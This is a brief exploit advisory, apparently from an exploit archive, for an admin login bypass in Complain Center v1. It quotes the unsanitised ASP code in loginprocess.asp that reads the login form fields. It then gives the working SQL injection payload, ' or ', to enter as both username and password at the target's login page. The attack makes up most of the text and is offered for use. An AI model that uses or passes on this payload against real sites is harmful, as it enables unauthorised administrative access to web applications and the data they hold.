|
ENGLISH
# Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
# Author : ajann
# Exploit;
[CODE]
loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...
//Before join login page
http://[target]/[path]/login.asp
Username : ' or '
Password : ' or ' and Login Ok
# ajann,Turkey